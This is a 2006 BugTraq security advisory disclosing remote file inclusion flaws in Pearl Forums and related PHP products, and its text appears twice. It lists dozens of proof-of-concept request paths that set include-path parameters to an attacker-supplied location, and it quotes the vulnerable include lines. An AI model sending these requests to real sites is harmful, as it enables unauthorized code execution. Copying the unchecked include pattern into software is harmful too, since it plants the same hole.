BugTraq
Back to list
|
Post reply
Pearl Products Multiple Remote File Inclusion
Jul 02 2006 10:41AM
xzerox linuxmail org
Pearl Products Multiple Remote File Inclusion
Discovered By zero [Moroccan Security Team]
Affected softwares:
Pearl Forums 2.4
Ngoc Biec 1.4
Pearl For Biz 2.4
Pearl For Mambo 1.6
URL : http://sourceforge.net/projects/pearlforums/
Risk : High
Impact: System access
------[ PoC ]-----------------------------------------
/index.php?Document[languagePreference]=[attacker]
/index.php?includesDirectory=[attacker]
/index.php?templatesDirectory=[attacker]
/includes/adminAttachments.php?GlobalSettings[templatesDirectory]=[attac
ker]
/includes/adminAvatars.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/adminBackupdatabase.php?GlobalSettings[templatesDirectory]=[at
tacker]
/includes/adminBanned.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/adminBoards.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/adminDocumentation.php?Document[languagePreference]=[attacker]
/includes/adminEmails.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/adminErrorlogs.php?GlobalSettings[templatesDirectory]=[attacke
r]
/includes/adminForums.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/adminGroups.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/adminMembers.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/adminPolls.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/adminReserved.php?GlobalSettings[templatesDirectory]=[attacker
]
/includes/adminSensored.php?GlobalSettings[templatesDirectory]=[attacker
]
/includes/adminSettings.php?GlobalSettings[templatesDirectory]=[attacker
]
/includes/adminSmileys.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/help.php?Document[languagePreference]=[attacker]
/includes/initialize.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/locale.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/login.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/members.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/merge.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/move.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/notify.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/password.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/password.php?Document[languagePreference]=[attacker]
/includes/poll.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/post.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/profile.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/register.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/search.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/split.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/terms.php?Document[languagePreference]=[attacker]
/includes/topics.php?GlobalSettings[templatesDirectory]=[attacker]
So if register_globals=on remote attacker could inject arbitrary
variable by Document[languagePreference] , GlobalSettings[templatesDirectory] or GlobalSettings[includesDirectory]
---[ Vuln Code ]--------------------------------------
[code index.php]
24. include("$Document[languagePreference]/lang.php");
28. include("$includesDirectory/initialize.php");
35. include("$templatesDirectory/master.php");
[/code]
[code /includes/adminAttachments.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminAttachments.php")
;
[/code]
[code /includes/adminAvatars.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminAvatars.php");
[/code]
[code /includes/adminBackupdatabase.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminBackupdatabase.ph
p");
[/code]
[code /includes/adminBanned.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminBanned.php");
[/code]
[code /includes/adminBoards.php]
21. include_once("$GlobalSettings[templatesDirectory]/adminBoards.php");
[/code]
[code /includes/adminDocumentation.php]
18. include_once("$Document[languagePreference]/documentation.php");
[/code]
[code /includes/adminEmails.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminEmails.php");
[/code]
[code /includes/adminErrorlogs.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminErrorlogs.php");
[/code]
[code /includes/adminForums.php]
21. include_once("$GlobalSettings[templatesDirectory]/adminForums.php");
[/code]
[code /includes/adminGroups.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminGroups.php");
[/code]
[code /includes/adminMembers.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminMembers.php");
[/code]
[code /includes/adminPolls.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminPolls.php");
[/code]
[code /includes/adminReserved.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminReserved.php");
[/code]
[code /includes/adminSensored.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminSensored.php");
[/code]
[code /includes/adminSettings.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminSettings.php");
[/code]
[code /includes/adminSmileys.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminSmileys.php");
[/code]
[code /includes/help.php]
18. include_once("$Document[languagePreference]/help.php");
[/code]
[code /includes/initialize.php]
47. include_once("$GlobalSettings[templatesDirectory]/master.php");
[/code]
[code /includes/locale.php]
18. include_once("$GlobalSettings[templatesDirectory]/locale.php");
[/code]
[code /includes/login.php]
39. include_once("$GlobalSettings[templatesDirectory]/login.php");
[/code]
[code /includes/members.php]
19. include_once("$GlobalSettings[templatesDirectory]/members.php");
[/code]
[code /includes/merge.php]
18. include_once("$GlobalSettings[templatesDirectory]/merge.php");
[/code]
[code /includes/move.php]
18. include_once("$GlobalSettings[templatesDirectory]/move.php");
[/code]
[code /includes/notify.php]
18. include_once("$GlobalSettings[templatesDirectory]/notify.php");
[/code]
[code /includes/password.php]
19. include_once("$GlobalSettings[templatesDirectory]/password.php");
20. include_once("$Document[languagePreference]/passwordMessages.php");
[/code]
[code /includes/poll.php]
18. include_once("$GlobalSettings[templatesDirectory]/poll.php");
[/code]
[code /includes/post.php]
18. include_once("$GlobalSettings[templatesDirectory]/post.php");
[/code]
[code /includes/profile.php]
18. include_once("$GlobalSettings[templatesDirectory]/profile.php");
[/code]
[code /includes/register.php]
18. include_once("$GlobalSettings[templatesDirectory]/register.php");
[/code]
[code /includes/search.php]
19. include_once("$GlobalSettings[templatesDirectory]/search.php");
[/code]
[code /includes/split.php]
18. include_once("$GlobalSettings[templatesDirectory]/split.php");
[/code]
[code /includes/terms.php]
18. include_once("$Document[languagePreference]/termsContents.php");
[/code]
[code /includes/topics.php]
18. include_once("$GlobalSettings[templatesDirectory]/topics.php");
[/code]
- Solution
------------------------------------------------------
declare variables
- Greetz
------------------------------------------------------
simo64, tahati, net_ghost, dabdoub, simo dreaminfo, iss4m, zerosecure, hunter, themenotor ...
- Contact
------------------------------------------------------
Author: Mourad [ zero ]
Email : xzerox(at)linuxmail(dot)org
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Discovered By zero [Moroccan Security Team]
Affected softwares:
Pearl Forums 2.4
Ngoc Biec 1.4
Pearl For Biz 2.4
Pearl For Mambo 1.6
URL : http://sourceforge.net/projects/pearlforums/
Risk : High
Impact: System access
------[ PoC ]-----------------------------------------
/index.php?Document[languagePreference]=[attacker]
/index.php?includesDirectory=[attacker]
/index.php?templatesDirectory=[attacker]
/includes/adminAttachments.php?GlobalSettings[templatesDirectory]=[attac
ker]
/includes/adminAvatars.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/adminBackupdatabase.php?GlobalSettings[templatesDirectory]=[at
tacker]
/includes/adminBanned.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/adminBoards.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/adminDocumentation.php?Document[languagePreference]=[attacker]
/includes/adminEmails.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/adminErrorlogs.php?GlobalSettings[templatesDirectory]=[attacke
r]
/includes/adminForums.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/adminGroups.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/adminMembers.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/adminPolls.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/adminReserved.php?GlobalSettings[templatesDirectory]=[attacker
]
/includes/adminSensored.php?GlobalSettings[templatesDirectory]=[attacker
]
/includes/adminSettings.php?GlobalSettings[templatesDirectory]=[attacker
]
/includes/adminSmileys.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/help.php?Document[languagePreference]=[attacker]
/includes/initialize.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/locale.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/login.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/members.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/merge.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/move.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/notify.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/password.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/password.php?Document[languagePreference]=[attacker]
/includes/poll.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/post.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/profile.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/register.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/search.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/split.php?GlobalSettings[templatesDirectory]=[attacker]
/includes/terms.php?Document[languagePreference]=[attacker]
/includes/topics.php?GlobalSettings[templatesDirectory]=[attacker]
So if register_globals=on remote attacker could inject arbitrary
variable by Document[languagePreference] , GlobalSettings[templatesDirectory] or GlobalSettings[includesDirectory]
---[ Vuln Code ]--------------------------------------
[code index.php]
24. include("$Document[languagePreference]/lang.php");
28. include("$includesDirectory/initialize.php");
35. include("$templatesDirectory/master.php");
[/code]
[code /includes/adminAttachments.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminAttachments.php")
;
[/code]
[code /includes/adminAvatars.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminAvatars.php");
[/code]
[code /includes/adminBackupdatabase.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminBackupdatabase.ph
p");
[/code]
[code /includes/adminBanned.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminBanned.php");
[/code]
[code /includes/adminBoards.php]
21. include_once("$GlobalSettings[templatesDirectory]/adminBoards.php");
[/code]
[code /includes/adminDocumentation.php]
18. include_once("$Document[languagePreference]/documentation.php");
[/code]
[code /includes/adminEmails.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminEmails.php");
[/code]
[code /includes/adminErrorlogs.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminErrorlogs.php");
[/code]
[code /includes/adminForums.php]
21. include_once("$GlobalSettings[templatesDirectory]/adminForums.php");
[/code]
[code /includes/adminGroups.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminGroups.php");
[/code]
[code /includes/adminMembers.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminMembers.php");
[/code]
[code /includes/adminPolls.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminPolls.php");
[/code]
[code /includes/adminReserved.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminReserved.php");
[/code]
[code /includes/adminSensored.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminSensored.php");
[/code]
[code /includes/adminSettings.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminSettings.php");
[/code]
[code /includes/adminSmileys.php]
19. include_once("$GlobalSettings[templatesDirectory]/adminSmileys.php");
[/code]
[code /includes/help.php]
18. include_once("$Document[languagePreference]/help.php");
[/code]
[code /includes/initialize.php]
47. include_once("$GlobalSettings[templatesDirectory]/master.php");
[/code]
[code /includes/locale.php]
18. include_once("$GlobalSettings[templatesDirectory]/locale.php");
[/code]
[code /includes/login.php]
39. include_once("$GlobalSettings[templatesDirectory]/login.php");
[/code]
[code /includes/members.php]
19. include_once("$GlobalSettings[templatesDirectory]/members.php");
[/code]
[code /includes/merge.php]
18. include_once("$GlobalSettings[templatesDirectory]/merge.php");
[/code]
[code /includes/move.php]
18. include_once("$GlobalSettings[templatesDirectory]/move.php");
[/code]
[code /includes/notify.php]
18. include_once("$GlobalSettings[templatesDirectory]/notify.php");
[/code]
[code /includes/password.php]
19. include_once("$GlobalSettings[templatesDirectory]/password.php");
20. include_once("$Document[languagePreference]/passwordMessages.php");
[/code]
[code /includes/poll.php]
18. include_once("$GlobalSettings[templatesDirectory]/poll.php");
[/code]
[code /includes/post.php]
18. include_once("$GlobalSettings[templatesDirectory]/post.php");
[/code]
[code /includes/profile.php]
18. include_once("$GlobalSettings[templatesDirectory]/profile.php");
[/code]
[code /includes/register.php]
18. include_once("$GlobalSettings[templatesDirectory]/register.php");
[/code]
[code /includes/search.php]
19. include_once("$GlobalSettings[templatesDirectory]/search.php");
[/code]
[code /includes/split.php]
18. include_once("$GlobalSettings[templatesDirectory]/split.php");
[/code]
[code /includes/terms.php]
18. include_once("$Document[languagePreference]/termsContents.php");
[/code]
[code /includes/topics.php]
18. include_once("$GlobalSettings[templatesDirectory]/topics.php");
[/code]
- Solution
------------------------------------------------------
declare variables
- Greetz
------------------------------------------------------
simo64, tahati, net_ghost, dabdoub, simo dreaminfo, iss4m, zerosecure, hunter, themenotor ...
- Contact
------------------------------------------------------
Author: Mourad [ zero ]
Email : xzerox(at)linuxmail(dot)org
[ reply ]